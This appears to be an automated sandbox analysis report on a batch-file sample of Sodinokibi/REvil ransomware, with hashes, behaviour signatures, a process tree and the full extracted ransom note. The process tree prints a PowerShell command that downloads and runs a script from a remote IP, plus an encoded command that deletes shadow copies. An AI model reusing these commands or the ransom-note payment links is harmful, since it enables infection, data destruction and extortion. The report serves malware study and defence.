Overview

overview

10

Static

static

6b344dbcf1...70.bat

windows7_x64

10

6b344dbcf1...70.bat

windows10_x64

10

Analysis

  • max time kernel
    42s
  • max time network
    51s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    19-08-2020 22:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6b344dbcf15e9fffe23ce5307af78070.bat

  • Size

    215B

  • MD5

    edcaf035412a5f6b004822eeba9ec0bc

  • SHA1

    5b65ca011d951eaa8266950415eb13dc55766d40

  • SHA256

    a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383

  • SHA512

    10e58b8f554cca5133ebb0c33800a2de7e063712a791832eaa505379a7897375737f20bad7c7ce0e6ecd1e79e2ab2d5728529fa6a3750f050d56509503474c02

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070

Extracted

Path

C:\7h6tcv2-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 7h6tcv2. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1481311B8AFEB78D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/1481311B8AFEB78D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: IfNpelCDrXAIbk+J4LbbDrOaBiIMgZ46OU8Y3Pi6JFhn8V/04yRX7pfrQXnBzGTl MddNw++CbmULlTxyokjpqD81HzO0nwosboGqAv2WOx1CL/bQO75kMrr9tHJ1MORe JemAwdmacw+wS/+N2oG70TTUX9yhisf9zz2JvhF+pLfNg/WyrAvSugLfDf9vgA6Q ShnBkryv7jxQ/p0cVrXWfyV5SMcG+FS/FIJR7z81RjD4a7G53wd97aQPDODPrp0W wEFuDPTvP0P/L+W0vX1taoy/iqPnRRAclbQQbOsVMKybP9Mo+eXJihSpQM9QyMYe eZQsKxBISYAg15LUK/6Djm7xTelUrBfxPDlQ7HODVQzXNH+jN9ydLNtp6L0sStaV wrStb2IYjGYl7cpbG86xPMkHcUH2zhF5I6oKH+Yr6t1klt5nFeZYXEmGZRGOZEGV UGyDxrQzdhYBW+xoyANE0Fky2/ATCcqtsw5W68nWbbhERPzXejvUeobSqpdrFvfG EbGguLhpSosLcCmypJdyWp8RBEH6nYYCwK517k7dAHe1c1eXpX+3RFltqalqPma+ IqbD7PKORySqFqi8Iuj9XYxJHDyrnWypzXtmY/V/mvN5d94SmqReNSn5/mEA96yb 7d3QQNlBcIL1/ScD7P3VEwZhuiDTB0O5TR/FfoshpJWcGIebgTWFfCH4QgELYBSl ISDMmJnrvVsZ/NOs8LWa1QHEkh2VKFHYRkgIrQ+4ahIdu6DneQgMGTTYHM7/AnDw SetwdgwopV4a7J5hUWEBFZLtV2mu8obholbjvaJUm7A95G0tE35/IBcljmfl8RI2 5uAbCtr2G8w6lxqhhI77h6hVs/bGuJp43GdyOCuXeQ9MRu/S2vp3hKapsUQwrRGT EAFTlt+mkuKBqD/zk5+/58q/berXCp6GgjoaY+ThzbrZKcb9y/hT+PxttAjv8Rw3 7e5jqLtWyWnQefm4xfDiAaDijvz6BJa9rsbiY6FTfaDeozb1ftt22UPyvfKa/uI1 Gx1caiKrrjhwCUY9qCPXV7bBA73cHxYheb8Yd6tLPVXKvwhOpl625SoR9xt359j9 H/lv9n1Y8LS6xUEpXEbPATwXVmIegVvqVPesM3PM5GiaaevtNBqZ+tDG0KLUFwgy jbziUzWzHWcywedd2JB07HdcuAZjGh76p8E2hslYr+zJ/c6NlAfbiXfZwZaLPQOX 8YN/kb4olhe0LbWso99Y3w6ykn83eHD4x2Es0GksSitR09O8kp6jPHEePjQQVCso +eCJbwMZmq61nkVXKnMuhJPd0MR1CZVIh0gpZrKUVVc3VQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1481311B8AFEB78D

http://decryptor.cc/1481311B8AFEB78D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Blacklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 33 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\6b344dbcf15e9fffe23ce5307af78070.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070');Invoke-LPYNMMII;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1820
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1576

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit

  • memory/1500-5-0x0000000005240000-0x0000000005241000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-21-0x0000000005880000-0x0000000005881000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-22-0x00000000062D0000-0x00000000062D1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-14-0x0000000005780000-0x0000000005781000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-13-0x00000000056B0000-0x00000000056B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-8-0x0000000005640000-0x0000000005641000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1500-4-0x0000000004760000-0x0000000004761000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-3-0x0000000004870000-0x0000000004871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-2-0x0000000000E20000-0x0000000000E21000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1500-1-0x00000000747D0000-0x0000000074EBE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1820-23-0x0000000000000000-mapping.dmp

    Download

  • memory/1820-25-0x00000000747D0000-0x0000000074EBE000-memory.dmp

    Filesize

    6.9MB

    Download